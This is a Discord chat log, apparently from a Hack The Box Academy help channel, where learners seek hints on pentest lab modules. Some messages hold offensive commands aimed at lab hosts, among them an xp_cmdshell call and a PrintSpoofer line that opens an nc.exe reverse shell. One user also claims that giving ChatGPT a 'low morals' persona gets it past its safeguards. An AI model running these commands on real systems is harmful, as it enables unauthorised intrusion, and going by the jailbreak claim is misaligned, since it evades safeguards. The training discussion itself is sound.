#

Hey folks, I have a question about the Meterpreter Tunneling & Port Forwarding section in the Pivoting, Tunneling, and Port Forwarding module.

||In the example where they describe setting up autoroute, they use the subnet "172.16.5.0/23" - but the IP address you see on the interface is 172.16.5.129 with a subnet mask of 255.255.254.0. Technically, wouldn't that make the subnet 172.16.4.0/23 as the usable IP range is 172.16.4.1 - 172.16.5.254?

If so, the answer expected for the second question is wrong, as far as I can tell (and I'll post this in #858470491676737536) - but if it's not wrong, I have no idea why you would supply 172.16.5.0/23... any ideas?||

rich vale
#

for AD skills assessment 2... I am stumped. I have user B*** and the db creds I can use for a system shell... but I am not sure where to go from here

fringe shell
#

Hey, anyone available for some help with the pivoting module? Specifically the reverse port forward section? My ssh -R command isn't working for me

rich vale
#

i skipped the pivot module and went straight to AD... dont recommend lol

graceful rampart
fringe shell
#

I'm the opposite, I skipped a few modules to go to pivot ๐Ÿ˜…

graceful rampart
rich vale
#

"ฮฅou have just completed the Active Directory Enumeration & Attacks module! "

sweet jesus dont skip the other modules lol

sterile thistle
#

hey @rich vale have you done the redeemer machine

rich vale
#

@sterile thistle nope, really just went straight in for the AD module

sterile thistle
#

do you know much about redis servers?

rich vale
#

sorry nope, dont know anything about them

sterile thistle
#

ok thank you

autumn pilot
#

careful with spoilers

astral vapor
#

Hi there ๐Ÿ˜„

#

I am a newbie in the information security field. I want to become an expert. Would you guys please help me to fulfill my desire.

#

Please suggest where to start from bug bounty or just do ctf.

vivid scaffold
#

ะขัƒั‚ ั” ัƒะบั€ะฐั—ะฝั†ั–?)

autumn pilot
#

english only

tight basin
#

Any hints for Password Attacks module for section Password Attacks Lab - Easy where the question is Examine the first target and submit the root password as the answer. ? Tried hydra and ncrack with username root and passwords list provided by HTB and mutated password list sorted and stripped from duplicates, created from custom rule resources using the passwords from resources as well. Thinking of using rockyou but seems too much for this lab and will take too much time even with highest threads possible.

ripe terrace
#

Perhaps you need to find your way in with another user first and work up to root once you've gained a foothold. Which is the case for almost all labs/boxes on HTB. You will seldom ever brute-force root from the outset.

tight basin
#

For ssh yes, for ftp i'm currently trying full username-password combo

#

but doing it with ncrack for ftp since hydra has been screwing me around, hope ncrack will work

#

oh RPOGGERS found creds for ftp !

ripe terrace
#

Excellent, now keep pulling at the thread until the whole sweater unravels.

tight basin
pulsar hollow
#

How to start pen testing for adroid in kali linux?

green ingot
#

C or rust for getting into hacking ?

graceful rampart
little wyvern
#

Hi I'm doing The Live Engagement of shells and payloads and am struggling with the first host.

I have found where I think I should upload the .war payload and successfully uploaded it, but when I navigate to that page I get a 404 error.
I also tried msfconsole tomcat_mgr_upload script but adter uploading the script get ,,exploit aborted due to failure failed to execute the payload"
Thank you

simple zephyr
#

is there any benefit of using medusa over hydra? One of the challenges call for it but the performance seems to be extremely slow compared to hydra.

midnight patio
#

Good evening. I need help on the Attacking Common Services - Hard module. I figured out the linked server but I'm stuck at the commands and I receive syntax errors when I try to execute them

warm kernel
#

Anyone here completed the 'live engagement shells & payloads'?

little wyvern
warm kernel
#

I got those without any uploads or shells... very bad labs

graceful rampart
#

Both of you can DM me. The more info you give me the faster ill reply

warm kernel
#

well I wanted to practice uploads, and got answer from a nmap scan... thats not practice! lol

#

@graceful rampart Sent you a PM

mint laurel
#

can someone help me with te beginner module ?

graceful rampart
midnight patio
#

EXECUTE('xp_cmdshell 'whoami'(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV] can somebody help me fixing this? I got a syntax error and if I'm not mistaken the corresponding module won't tell me how to fix it

thorn urchin
#

mixing quotes is usually bad and I have no idea where youre getting whoami("sysadmin") from as a cmdline utility

#

cause right now execute is basically reading it as ```'xp_cmdshell ', whoami, '("sysadmin")'

midnight patio
#

thanks. I fixed it by asking ChatGPT

#

I need to learn coding x_X

#

I got it from the "Attacking common services" module

#

MSSQL

fathom pendant
#

Lol asking chatgpt

woeful ermine
#

Skills Assessment - Web Fuzzing - 2nd question- I've found 5 extensions but can't figure out in what order I need to put them. Do I need to add dots or commas between them?

#

This is the worst assesment

sly tapir
deft bison
sage glacier
#

Hi, is there any modules, paths, etc. that deals with the burpusite tool?

deft bison
sage glacier
#

okey ty my friend

sly nebula
full elk
#

Hi, anyone can help me with this? STACK-BASED BUFFER OVERFLOWS ON LINUX X86 > Determine the Length for Shellcode

rustic sage
#

Hey guys i started coding like 3 months ago and i think maybe someone can send me script of code of some program so i can stard codding and de-codding with that script thanks๐Ÿ˜€

thorn urchin
#

this channel is for discussing academy modules

full elk
high totem
#

Hi, I must be missing something regarding attacking DNS in attacing common services. I have two subdomains to inlanefreight after doing simple dig any. I wanted to follow the module and do a zone transfer. Not possible on any of the three domains I have. Tools like subfinder do not find anything. What am I missing?

iron basin
#

@pliant sage Still having troubles with proxy?

#

IF anyone is have trouble with the module USING Web Proxies - Proxying tools, here might be a solution. IF you are following the steps and editing the proxychain.conf file to comment out the tor proxy and add the http 127.0.0.1 8080 and https also, make sure to comment out the DNS proxy in the conf file. If you do not, using proxychains will not work as the DNS resolution will fail. That or pick a DNS proxy server also if you don't comment the proxy dns part in the conf file. This should resolve the error with connections timing out when using proxychains. Also make sure you have a proxy server settup via burpsuite.

full elk
high totem
fluid maple
#

Can anyone give a nudge on Footprint Lab - Medium? I found the credentials for the SQL Management Server but I'm still unable to connect to the server. I'm curious what else I'm missing.

fathom pendant
#

What other services are running

fluid maple
#

Hmm, I'm afraid that what I will explain might be a spolier. Can I DM you?

fathom pendant
#

That was my nudge to you

fluid maple
#

Thanks. I'm confused by the nudge, I guess. I've found the credentials for the user that accesses SQL Manager - I guess you're saying that is a dead end? Per the hint, it seems like that is what I should be looking for.

fathom pendant
#

Yes that is correct, and the path forward might not seem obvious at first but if you take a look around maybe you'll find it. Look at everything you can access/see with that user

fluid maple
#

Gotcha, thanks. I was able to access other things with their credentials but, yeah, nothing seems glaringly, or even the slightest bit obvious. I'll keep spelunking.

fathom pendant
#

Another hint; check for files you can read.

queen hatch
#

Web Attacks - Bypassing Security Filters

I'm having troubles finding the correct HTTP Method.
I've tried to follow along with the module testing for test; / test%3B against the following methods:

GET
HEAD
POST
PUT
DELETE
OPTIONS
PATCH

All tests (other than HEAD since it doesn't return data) have responded with "Malicious Request Denied!".
I've tried yesterday and today. I've rebooted the target 3 times.

How close should I be sticking to the module for this section?

rapid marten
#

hey, can anyone help me with the easy skill assessment for password attacks?

sterile falcon
#

"Looking for nudge towards user on Soccer,"

queen hatch
wild turtle
#

Can somebody give me a hand ๐Ÿ‘€ new to cyber security. Stuck on hacking wordpress. Doesn't seem clear but could be me being thick

#

Search for "WordPress xmlrpc attacks" and find out how to use it to execute all method calls. Enter the number of possible method calls of your target as the answer.

wild turtle
thorn urchin
#

Which module? there is no academy module called Login

#

you DO know youre in the academy modules channel right?

wild turtle
#

Hacking wordpress

queen hatch
#

There's at least 9. Not that all would work specifically for xmlrpc attacks.

fathom pendant
raven cairn
#

Can I have a nudge with Attacking common services FTP ?

#

This section is really weird

#

Iโ€™m trying to connect to SSH thru hydra

high sentinel
#

what is the exact issue?

#

dm? ๐Ÿ˜„

raven cairn
#

Sure lmao ๐Ÿ˜‚

wild turtle
wild turtle
wild turtle
simple zephyr
#

I am stuck on Attacking DNS and I have going through I think everything listed on the module and I am getting nothing. I get AXFR record query failed when I attempt to run a zone transfer. I found what I think I was suppose to find with subbrute but now I am stuck.

high sentinel
#

stuck at what exactly?

simple zephyr
#

Let me DM you

wild turtle
#

How did you solve this ๐Ÿ‘€

queen hatch
wild turtle
wild turtle
fathom pendant
#

It's not about how much you do at once, it's about how much you'll retain in a week/month after

fluid maple
simple zephyr
#

still stuck on on Attacking Common Services - DNS I found what I think your supposed to find with gobuster and subbrute. I am stuck though what to do next and I have attempted everything. I get an error when trying to zone transfer also. I even attempted to further enumerate the sub domain that I found.

cunning void
#

is the linux fundamentals module enough to know the basic about linux

compact raft
#

Anyone having issues with Kerbrute getting error sending over UDP failed ๐Ÿ˜ž

atomic ruin
cunning drum
compact raft
#

@cunning drum Thanks, I will try that

earnest pagoda
#

Attacking Common Applications - Skills Assessment II
First Question, "What is the URL of the WordPress instance?"

I fuzzed the vhost using ffuf and got 3 vhosts.
For all intents and purposes, I think b*** is the WordPress instance, but I have tried every URL and it is not correct.
All other questions are correct, only this first one is not correct and is wasting a lot of time.
Can you please give me a hint?

cunning drum
#

i think you need to also search for wordpress directory

#

after getting vhosts

rustic sage
#

anyone done password attack hard lab?

sturdy igloo
vital adder
earnest pagoda
brisk geode
#

can anyone help me with the Passwd, Shadow & Opasswd >> password attacks

i got the hash but i get this error while cracking it

thorn urchin
#

your hashes are formatted wrong

#

that IDed good for me, your text file for it could be messed up tho

#

did you unshadow it properly?

brisk geode
#

okay

#

its working now

#

thanks

buoyant void
#

So after spending literally hours trying to figure out why I couldn't get the network enumeration medium lab I looked through the older messages in here and saw that it would only work if I use the browser pwnbox instead of my own VM. Extremely frustrating, but all that aside I was hoping someone more knowledgeable could explain why that specific lab doesnt work when I try to use my VM with the VPN connected

brisk geode
#

hey i never used mimikatz before whats the command of dumping hashes?

#

gonna learn mimikatz later currently just need it for a module

novel matrix
brisk geode
#

ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

novel matrix
#

then research that error

tidal kelp
#

Module Name: Password Attacks

Section Name: Credential Hunting in Windows

I don't know how to answer the last question, please help me. thanks. (What are the credentials to access the Edge-Router) (PS: I got it)

tight basin
tidal kelp
brisk geode
tight basin
wild turtle
tidal kelp
wild turtle
brisk geode
versed frost
#

Module Name: INFORMATION GATHERING - WEB EDITION

Section Name: Information Gathering - Web - Skills Assessment can some one illustrate to me how to use sublist3r to preform a subdomain enumeration on githubapp.com, I tried in many ways and could not get an answer

buoyant escarp
#

What addressing mechanism is used at the Link Layer of the TCP/IP model?

unborn adder
#

Can someone help me with "Attacking Common Services Lab - Easy". I'm currently at the early stages where I have tried username enumeration via SMTP, FTP bruteforcing (using the list from "Resources") but nothing is hit. The web site on port 80 doesn't contains much information (I even tried directory bruteforce but the results don't have anything really useful)

vital adder
vital adder
vital adder
buoyant escarp
vital adder
#

oh wait so you just copy and paste the section question??

#

hint read the stuff under Addressing Mechanisms

unborn adder
vital adder
#

oh and don't forget the ||domain||

vital adder
#

it's a F ing powershell command ๐Ÿคฃ of course cmd doesn't recognized that

#

if you need that use powershell command for whatever reasons then yes (hint you do)

unborn adder
tidal kelp
tidal kelp
dim cosmos
#

i wonder what sort of on time delivery performance Inlanefreight has

versed frost
brisk geode
tidal kelp
rustic sage
#

AD Enumeration & Attacks - Skills Assessment Part II,
i am trying to run PrintSpoofer on SQL01
xp_cmdshell c:\users\public\PrintSpoofer.exe -c "c:\users\public\nc.exe 172.16.7.240 1234 -e cmd" but it tells me "This version of c:\users\public\PrintSpoofer.exe is not compatible with the version of Windows you're running".
I checked and this windows version is 2019
so should not be a problem :/ (i also tried with JuicyPotato.exe which worked all the time and i had the same issue). Any idea by any chance?

quick prairie
#

hey guys ฤฑ wanna be hacker ฤฑ know a little bit python what shoud ฤฑ learn first

#

and can you share sources about it

brisk geode
quick prairie
#

it has cost yo

#

ฤฑ dont have money

#

ฤฑ hav to learn with open sources

proud pine
quick prairie
#

where shoud ฤฑ go to then

#

how did you learn bro

proud pine
pine spoke
brisk geode
pine spoke
#

check out the resources channels too its pretty cool

quick prairie
#

whฤฑck courses do you suggest

pine spoke
#

I started with Cracking into hack the box

#

I think its a great start

bright ridge
#

definitely do cracking into hack the box

clear saffron
#

Needing a little nudge on Web Attacks-Skills Assessment,if anybody is available

wraith spoke
#

I am doing the password Attacks Lab - Hard atm and I think I am missing something because I have spend 4 days on bruteforcing it and I can't simply believe that is the solution. Can some lend me their ear hear out my ennumeration and tell me what is going wrong in my mind?

graceful rampart
#

Depends on the box. Some easy boxes are actually easy, some are more like medium

modest isle
#

@pine spoke

old verge
#

Can I get some assistance with Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio. from Pass the Ticket (PtT) from Linux. I have copied over all ccache files from tmp directory to root. I have export them into KRB5CCNAME. When I attempt to connect with smbclient, I am getting error "gse_get_client_auth_token: gss_init_sec_context failed with Miscellaneous failure (see text): encryption type 0 not supported
gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/dc01 failed (next[(null)]): NT_STATUS_LOGON_FAILURE" Please dm me. I have been stuggling with this error for awhile. Thank you

still yacht
#

Need some help with DNS active enumeration module :/ I cant find the content of the txt record

#

If any1 have time hit me up in dmยดs

livid bluff
#

Hello
I am blocked at the level of the filter evasion on the conmand injection module.
To the question:
Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application?

I have tried all operators, I have also inserted them in url encode but none of my answers is accepted.
Thanks in advance for any tips and help me to understand what is expected as a good answer.

shadow canopy
livid bluff
shadow canopy
#

try only the injection operators not followed by commands

livid bluff
twilit cipher
#

In this module: Pivoting, Tunneling, and Port Forwarding in the Meterpreter Tunneling & Port Forwarding section, I don't think I understand what the second question is asking:
Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)
Anyone done this yet, and can provide a kick in the pants?

livid bluff
twilit cipher
brisk geode
#

Hey im stuck at pass the hash >> password attacks

question: Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

i tried to get a reverse shell using both tun0's ip and the other one but im not getting any reverse shell back onto the listener which is hosted on MS01

autumn pilot
#

In the Attacking Common Services - Easy section, is it normal to not get an output from the "webshell"?

vital adder
#

no idea why but yes, if you upload your shell through an ||vuln|| it's won't run normal php and for that method i end up have to use an php RCE payload with powershell

#

the other upload method can run php just fine

vital bough
#

When you use intruder in burp it actually sends the file if it's a POST request right? Like in the file upload attacks. I keep getting 404's on the whitelist part, where I had no problems on blacklisting..any hints?

vital adder
#

for this i use ffuf not burp intruder but yes it will send the file and if you are using the given command to make your wordlist hint add more or replace some of the extensions in that command

vital adder
vital adder
vital adder
fathom pendant
#

Sounds like the info gathering web edition

#

For the one for flaps

#

I just recently did that one

vital adder
vital adder
old verge
#

@vital adder Thank you for the tip. I did use -c in my smbclient command

vital adder
#

and did you get the flag?

old verge
#

no sir.. connection error

vital adder
#

yeah give me a sec let me give that a try

old verge
#

@vital adder Another person stated that I might be using the wrong ticket. I was looking at /tmp

vital adder
#

there is a lot of ticket in /tmp

old verge
#

correct.. tried both julio

vital adder
#

after you import a ticket use klist to get info of the ticket you just imported

vital adder
old verge
#

actually tried all

#

yeah. noticed that

brisk geode
#

seems like needs to import the other module

vital adder
#

hint wrong domain

#

i don't know why the one show in the example work but just use that

autumn pilot
#

the domain is not an issue

#

play around with the encoded payload

vital adder
#

so no need for the -c thing like the last time i do this ๐Ÿคฃ

glass pecan
#

Hi everyone, can someone help me on question 8 from Windows Command Line skill assessment, I already log in to the domain controller, but I cant find the hidden flag inside one of the loaded modules

#

plus I dont know what the flag may look like so I cant use sls

buoyant escarp
#

hey can someone give me a hint, in which folder i might look for flag.txt
module: Hacking Wordpress
section: Directory Indexing

patent obsidian
#

hello could someone help me with the Web Attacks - Skills Assessment module.
Do you have any hints on how to list users and admins?
thanks

still yacht
#

anyone that have some knowladge again about dns and axfr need some help with module /module/112/section/1069 DNS

#

trying to get the ip of the FDQN with last octet 203

deft bison
deft bison
buoyant escarp
deft bison
#

based on the module reading, did you get to /mail-masta?

buoyant escarp
#

oh no i did not

buoyant escarp
#

0 Defensive xD

still yacht
#

Is there any problems with pwnbox or acadamy atm my vpn and my pwn box cant reach the spawned host

iron coyote
#

Hi! Has anyone active done the skills assessment for the new File Inclusion module?

iron coyote
#

yee!

deft bison
#

have you explored the website and checked the src page?

#

i think that's the way i got started

deft bison
# iron coyote yee!

if you're still stuck, i recommend visiting php filters and php wrappers section of the module

iron coyote
#

Thank you for your help! I guess we just needed to do the base64 again

sage glacier
#

Hi guys I have a question, how can i get a remote session, with a VPN, if they don't give me a password??

#

(I only have machine's IP)

patent obsidian
thorn urchin
sage glacier
#

yeh

thorn urchin
#

You download the vpn connection file and run it with openvpn. No password needed

weak stirrup
#

i am working on hackthebox.com/module/31/section/390 it wants me to give it the EBP but i don't understand from the question at what point in execution it wants the ebp. I have tried to gdb break on main and give it that ebp address but it is not the ebp it wants. can someone explain the question a bit better to me

sage glacier
thorn urchin
#

Yeah? thats nothing to do with the VPN then

#

thats dependant on what module/section youre doing

#

maybe finding the password is part of the scenario

sage glacier
#

OMG those of hackthebox work hard xD

#

so i dont know where it can be found, I'll wait to the next pwnbox

native lily
#

Hi guys.. New member in here ๐Ÿ˜๐Ÿ˜๐Ÿ˜

weak stirrup
#

Is this the correct channel to ask for clarifications on modules in HTB Academy?

thorn urchin
#

clarifications? sure

ripe terrace
upbeat wave
#

What is a good virtual machine host software for the m1 macbook pro?

#

My virtualbox keeps crashing

weak stirrup
#

great. i am working on 'take control of eip' and I and I am unclear what the question is a asking for at the end of the section. It wants me to give it a EBP register but the EBP register during the 'experiment' is over written. the EBP will change depending on where it is in a programs execution.

#

can someone explain what state i am trying to get the program in and give the ebp. the question seems open ended to me.

buoyant escarp
weak stirrup
#

all the question says is "Examine the registers and submit the address of EBP as the answer." but i don't understand from the context at what point in the execution i should look at the registers

twilit cipher
#

@ripe terrace I put something in errata, too. Your analysis is correct, I think. TBH, there are 512 โ€œcorrectโ€ answers to that question.

upbeat wave
buoyant void
#

Quick question for the community, I wasted hours trying to complete a relatively simple task for the firwall and IDS/IPS evasion medium lab yesterday on my VM only to figure out it would only give me the flag if I used pwnbox. Does anyone remember if the firewall IDS/IPS hard lab needs to be done on the pwnbox or can I use my VM? I don't want to waste all that time again

fluid maple
deft bison
buoyant void
buoyant void
graceful rampart
#

Can anyone give me a nudge on the SQL Injection Skills assesment? I feel really dumb but i cant get past the login page ๐Ÿ˜… . I cant get it to error no matter what I do

patent obsidian
#

@deft bison friend I have already listed the users,
get the token
and change password
but I don't know how to discover the admin

fathom mural
#

Help please. I can't get this machine to spawn

#

I can't paste a picture but its the Redeemer one from the very beginning

iron basin
#

Nvm

fathom mural
#

the spawn machine button is just greyed out

#

Nevermind I guess. I've had this issue all day and just now it fixes

graceful rampart
fathom mural
#

where do I go for that?

graceful rampart
fathom mural
#

Is that under a different discord? sorry for being ignorant but I don't see that as an option

graceful rampart
fathom mural
#

oh, thank you

ripe terrace
dense prairie
#

What would be the preferred method of gaining full source code of a website? I currently have burpsuite, mimikatz and pass the hash (I know mimikatz and pass the hash wouldnโ€™t really be used for this) but I have em if needed

graceful rampart
ripe terrace
#

CURL wouldn't get you the full source code, just the rendered output.

dense prairie
ripe terrace
#

Unless OpenAI has a repo and/or the source code is public, or you have explicit written permission to access their servers, what you're describing is illegal.

graceful rampart
#

Youre in the wrong server

#

We dont do illegal things here

buoyant escarp
dense prairie
fathom pendant
#

joins htb discord server
Doesn't know what htb academy is
Probably doesn't even know what htb is

graceful rampart
fathom pendant
#

Hi tux

graceful rampart
fathom pendant
#

Hypothetically speaking; google exists

graceful rampart
#

๐Ÿ˜†

fathom pendant
#

Also hypothetical; chatgpt exists

dense prairie
#

I use chatgbt but I googled discord servers associated with the hacking field to find this group. Additionally Iโ€™d be more than welcome to run you though how to hypothetically rob a bank if needed the discussion itself is not illegal

graceful rampart
#

hypothetically, Would chatgpt tell you how to hypothetically do illegal things? hypothetically

fathom pendant
#

Also tux; called it

dense prairie
#

Yes, you just tell it that it has low morals when giving it a persona. And either stands for โ€œhack the boxโ€ or som else

graceful rampart
dense prairie
# graceful rampart

Man wasting his own time thinking he did something special, ya got me op lol good job ๐Ÿค“๐Ÿค“

fathom pendant
#

Htb works on the white hat hacking field, all content on htb and htb academy is all above board. With explicit permissions and scopes given

#

Aka we're not helping you

#

Google your question, and keep trying there.

graceful rampart
fathom pendant
#

Of course

#

And not have reading comprehension to understand why we aren't helping

dense prairie
rustic sage
#

i am trying to mount a vhd file in my linux host. i run the following command and get the following error:
guestmount --add Backup.vhd --ro /mnt/vhd2/ -m /dev/sda2
ERROR: mount: /sysroot: unknown filesystem type 'BitLocker'.

#

any ideas?

fathom pendant
honest hazel
buoyant void
#

FYI if anyone else experiences any issue on the firewall evasion medium lab using your VM, switch over to a UPD VPN config instead of TCP, that solved the issue for me

dense prairie
fathom pendant
#

Then there's your answer as to why we aren't helping you. You don't have permission, so even though you may not have malicious intent with it, you don't have permission making it illegal

graceful rampart
drifting arch
#

hi

buoyant escarp
#

Im in the skill assessment for wp hacking. I cant see any hints in the source code for the use of wordpress. Do i need to search for a subdomain first?

drifting arch
#

i don't have RTX 4090 TI OC Super

#

can anyone help me ?

graceful rampart
drifting arch
#

because i don't have RTX

deft bison
fathom pendant
drifting arch
#

why

fathom pendant
#

Why do you think you need one?

drifting arch
#

because my program doesn't works

fathom pendant
#

Ok? And that's related to a 4090 how?

drifting arch
#

yes

#

||`#include <iostream>

int main()
{
std::cout << "Hello world";
}`||

#

ez

fathom pendant
#

Ok?

drifting arch
#

OK

fathom pendant
#

Not sure how that relates to a GFX card buddy

thorn urchin
weak stirrup
#

i am doing module/31/section/392 can i get some help with the question

woeful ermine
#

what about telling the name of the module first ๐Ÿ˜„

weak stirrup
#

named: stacked based buffer overflows on linux -- generating shellcode

buoyant escarp
weak stirrup
#

it is requesting i submit the "size of the stack space after overwriting".. the stack starts at 0xFFFFFFFF and so i calculate the size as that 0xFFFFFFFF - ESP is that what is is asking for?

#

i.e. if i had a esp of 0xffff0000 then my size woudl be 0xffff?

#

do i understand the question correctly?

ripe terrace
#

Has anyone encountered regular/consistent SegFaults running Nmap through the Ubuntu pivot host in the Skills Assessment of the Pivoting, Tunneling, and Port Forwarding module? My gut instinct is the -sC / -sV flags are the cause, so I will attempt another port-only scan. But I'd like to know if that's expected or usual when using an SSH dynamic bind and proxychais.

graceful rampart
#

I didn't have that issue at all

iron coyote
#

Hello again! Still on the File Inclusion Assessment: Did anyone else have trouble changing the user agent parameter?

oak dagger
#

Did you figure out what to do here, I am not sure what "web interface" means here - I assume this is not the pawnbox (or is it?)

ripe terrace
graceful rampart
#

Kali

ripe terrace
#

Might be my ParrotOS setup potentially.

graceful rampart
#

You can determine is its ssh really quicky

#

Just try pivoting a different way

#

If no error then it's something with ssh. If there is still an error then it's obviously something else

ripe terrace
#

Yeah might give that a try and see what happens. The port only scan was successful however.

oak dagger
#

Never mind - figured it out.

#

For anyone stuck on Nessus Skills Assessment and "Navigate to the web interface at the end of this section and log in with the provided credentials.", in this case the "web interface" is actually what is usually the target machine. Treat that as your Nessus host.

open mortar
#

Hey everyone! I'm having trouble with the first Web Requests exercise, the problem in which you're required to use cURL to download the file and find the flag. I can successfully download the file using
curl -O inlanefreight.com/download.php
but I cannot find the flag within the file, can anyone help?

hazy grotto
#

Anyone know what i am doing wrong here>

โ”€โ”€(ruderaphใ‰ฟkali)-[~/tcm/cyberheroes]
โ””โ”€$ feroxbuster -u http://10.10.82.158/ --depth 3 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -e
Error: Could not create Configuration

Caused by:
No such file or directory (os error 2

#

trying to go through a depth of three. Not sure how to do it in gobuster.

graceful rampart
#

I know how to do that with ffuf. I dont use ferox tho

hazy grotto
#

ferox is rust related so i attribute that it's faster.

#

It worked for me once but i must have forgotten to take the notes or they didn't save.....

#

I'm my own worst enemy

#

Hmm got it to work with a different wordlist. infuriating .

graceful rampart
#

Oh, well that makes sense since the error was a file not found error

fathom pendant
#

Ye

open mortar
#

Update: found the flag, just needed to alter the command slightly

fathom pendant
#

That tends to be the case

rapid marten
#

can someone give me a hint on password attacks medium lab?

graceful rampart
rapid marten
#

oh ok no problem

#

i'll dm you

#

thx ๐Ÿ™‚

neon depot
#

Hello I need to get help for this window fundamentals module. Can anyone help me out

solar zodiac
#

really happy there is a mssql blind injection module ๐Ÿ™‚

#

filled in alot of gaps in knowledge I had

#

great module! ๐Ÿ˜„

prime minnow
#

Need urgent help on how to mass report insta account to get it removed or ideally someone who can get it taken down thanks.

prime minnow
#

Ahh sorry, you got any servers to point me in the right direction?

solar zodiac
#

whats insta account ๐Ÿ˜ฎ

prime minnow
#

Instagram

solar zodiac
#

o